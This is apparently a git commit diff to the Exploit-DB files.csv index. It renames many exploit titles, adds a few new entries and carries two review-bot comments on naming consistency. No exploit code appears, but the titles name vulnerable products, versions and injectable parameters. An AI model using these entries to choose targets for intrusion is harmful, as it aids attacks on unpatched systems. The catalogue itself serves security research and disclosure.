DB: 2016-12-27
4 new exploits Serv-U FTP Server < 5.2 - Remote Denial of Service RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service FTPShell Server 6.36 - '.csv' Local Denial of Service Serv-U FTP Server 3.x < 5.x - Privilege Escalation RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal IndexScript 2.8 - (show_cat.php cat_id) SQL Injection IndexScript 2.8 - 'cat_id' Parameter SQL Injection GForge < 4.6b2 - (skill_delete) SQL Injection GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection torrenttrader classic 1.07 - Multiple Vulnerabilities TorrentTrader Classic 1.07 - Multiple Vulnerabilities Camera Life 2.6.2 - 'id' SQL Injection Camera Life 2.6.2 - 'id' Parameter SQL Injection Full PHP Emlak Script - 'arsaprint.php id' SQL Injection Full PHP Emlak Script - 'arsaprint.php' SQL Injection CCMS 3.1 - (skin) Multiple Local File Inclusion CCMS 3.1 - 'skin' Parameter Local File Inclusion JMweb - Multiple (src) Local File Inclusion JMweb - 'src' Parameter Local File Inclusion geccBBlite 2.0 - (leggi.php id) SQL Injection geccBBlite 2.0 - 'id' Parameter SQL Injection PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection PHP-Fusion Mod recept - (kat_id) SQL Injection PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection Yerba SACphp 6.3 - (mod) Local File Inclusion 
Yerba SACphp 6.3 - Local File Inclusion Joomla! Component com_hotspots - (w) SQL Injection Joomla! Component com_hotspots - SQL Injection PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection PHP Autos 2.9.1 - 'catid' Parameter SQL Injection Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection AdMan 1.1.20070907 - 'campaignId' SQL Injection AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection Gforge 4.5.19 - Multiple SQL Injections Gforge 4.6 rc1 - (skill_edit) SQL Injection GForge 4.5.19 - Multiple SQL Injections Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting IranMC Arad Center - 'news.php id' SQL Injection IranMC Arad Center - SQL Injection Ayco Okul Portali - (linkid) SQL Injection (tr) Ayco Okul Portali - 'linkid' Parameter SQL Injection Easynet4u faq Host - 'faq.php faq' SQL Injection Easynet4u faq Host - 'faq.php' SQL Injection MunzurSoft Wep Portal W3 - (kat) SQL Injection Easynet4u Link Host - 'cat_id' SQL Injection SlimCMS 1.0.0 - (redirect.php) Privilege Escalation Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection Easynet4u Link Host - 'cat_id' Parameter SQL Injection SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation Joomla! 
Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection Real Estate Scripts 2008 - 'index.php cat' SQL Injection Real Estate Scripts 2008 - 'cat' Parameter SQL Injection ParsBlogger - 'links.asp id' SQL Injection IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection ParsBlogger - 'links.asp' SQL Injection IndexScript 3.0 - 'parent_id' Parameter SQL Injection XOOPS Module xhresim - 'index.php no' SQL Injection XOOPS Module xhresim - SQL Injection SezHoo 0.1 - (IP) Remote File Inclusion SezHoo 0.1 - Remote File Inclusion torrenttrader classic 1.09 - Multiple Vulnerabilities TorrentTrader Classic 1.09 - Multiple Vulnerabilities AdaptCMS Lite 1.5 2009-07-07 - Exploit AdaptCMS Lite 1.5 - Arbitrary Add Admin Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting Joomla! Component Blog Calendar - SQL Injection PHPMailer 5.2.17 - Remote Code Execution
parent af66bcd9e5
commit 6a202bbb97
6 changed files with 286 additions and 48 deletions
98 files.csv
|
@ -71,7 +71,7 @@ id,file,description,date,author,platform,type,port
|
|||
428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0
|
||||
429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0
|
||||
433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos,0
|
||||
463,platforms/windows/dos/463.c,"Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
|
||||
463,platforms/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
|
||||
468,platforms/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",windows,dos,0
|
||||
471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66
|
||||
474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0
|
||||
|
@ -814,7 +814,7 @@ id,file,description,date,author,platform,type,port
|
|||
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
|
||||
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
|
||||
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0
|
||||
6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
|
||||
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
|
@ -960,7 +960,7 @@ id,file,description,date,author,platform,type,port
|
|||
8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
|
||||
8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0
|
||||
8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0
|
||||
8212,platforms/windows/dos/8212.pl,"Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
|
||||
8212,platforms/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
|
||||
8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0
|
||||
8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0
|
||||
8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0
|
||||
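Review bot: The new 8212 title keeps the FTP command in parentheses, "(SMNT) Authenticated Denial of Service", while the sibling row 8211 renamed in this same commit switches to the quoted form 'MKD'. Suggest "RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' Authenticated Denial of Service" so both Serv-U 7.4.0.1 rows follow one convention. The renamed 6660 row has the same leftover in "(stou con:1)".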
|
@ -5330,6 +5330,7 @@ id,file,description,date,author,platform,type,port
|
|||
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
|
||||
40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -5444,7 +5445,7 @@ id,file,description,date,author,platform,type,port
|
|||
369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0
|
||||
374,platforms/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local,0
|
||||
375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",linux,local,0
|
||||
381,platforms/windows/local/381.c,"Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
|
||||
381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
|
||||
388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
|
||||
393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
|
||||
|
@ -8735,6 +8736,7 @@ id,file,description,date,author,platform,type,port
|
|||
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
|
||||
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
|
||||
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
|
||||
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -9889,7 +9891,7 @@ id,file,description,date,author,platform,type,port
|
|||
8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow",2009-03-12,"Jeremy Brown",windows,remote,0
|
||||
8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0
|
||||
8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0
|
||||
8211,platforms/windows/remote/8211.pl,"Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
|
||||
8211,platforms/windows/remote/8211.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
|
||||
8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0
|
||||
8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote,0
|
||||
8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
|
||||
|
@ -11785,7 +11787,7 @@ id,file,description,date,author,platform,type,port
|
|||
20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0
|
||||
20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0
|
||||
20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0
|
||||
20461,platforms/windows/remote/20461.txt,"Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
|
||||
20461,platforms/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
|
||||
20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0
|
||||
20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0
|
||||
20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection",1999-07-23,fsaa,cgi,remote,0
|
||||
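Review bot: The renamed 20461 row uses the vendor prefix "Cat Soft", while every other Serv-U row touched in this commit (463, 6660, 8212, 381, 8211) is prefixed "RhinoSoft". If the difference is deliberate for the 2.4/2.5 releases, it is worth saying so in the commit message; otherwise a title search for "RhinoSoft Serv-U" will silently miss this directory traversal entry.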
|
@ -17830,7 +17832,7 @@ id,file,description,date,author,platform,type,port
|
|||
4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0
|
||||
4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0
|
||||
4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0
|
||||
4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0
|
||||
4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' Parameter SQL Injection",2007-07-25,xssvgamer,php,webapps,0
|
||||
40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0
|
||||
4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0
|
||||
|
@ -17915,7 +17917,7 @@ id,file,description,date,author,platform,type,port
|
|||
4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
|
||||
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
|
||||
4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
|
||||
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
|
||||
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
|
||||
4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
|
||||
4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0
|
||||
4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0
|
||||
|
@ -17986,7 +17988,7 @@ id,file,description,date,author,platform,type,port
|
|||
4496,platforms/php/webapps/4496.txt,"Joomla! Component Flash Image Gallery - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps,0
|
||||
4497,platforms/php/webapps/4497.txt,"Joomla! Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0
|
||||
4499,platforms/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0
|
||||
4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
|
||||
4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
|
||||
4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0
|
||||
4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - (xkurl.php PEARPATH) Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0
|
||||
4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0
|
||||
|
@ -19232,7 +19234,7 @@ id,file,description,date,author,platform,type,port
|
|||
6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0
|
||||
6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0
|
||||
6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0
|
||||
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
|
||||
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' Parameter SQL Injection",2008-07-25,nuclear,php,webapps,0
|
||||
6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
|
||||
6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0
|
||||
6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
|
||||
|
@ -19611,73 +19613,73 @@ id,file,description,date,author,platform,type,port
|
|||
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
|
||||
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
|
||||
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
|
||||
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Parameter Local File Inclusion",2008-10-03,SirGod,php,webapps,0
|
||||
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
|
||||
6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps,0
|
||||
6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion",2008-10-04,SirGod,php,webapps,0
|
||||
6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Parameter Local File Inclusion",2008-10-04,SirGod,php,webapps,0
|
||||
6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0
|
||||
6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0
|
||||
6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
|
||||
6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0
|
||||
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0
|
||||
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0
|
||||
6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0
|
||||
6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0
|
||||
6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0
|
||||
6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - (kat_id) SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion",2008-10-06,NoGe,php,webapps,0
|
||||
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
6691,platforms/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0
|
||||
6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0
|
||||
6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - SQL Injection",2008-10-07,cOndemned,php,webapps,0
|
||||
6693,platforms/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps,0
|
||||
6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0
|
||||
6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,php,webapps,0
|
||||
6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0
|
||||
6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0
|
||||
6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0
|
||||
6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
|
||||
6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
|
||||
6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD",2008-10-08,GoLd_M,php,webapps,0
|
||||
6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps,0
|
||||
6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
|
||||
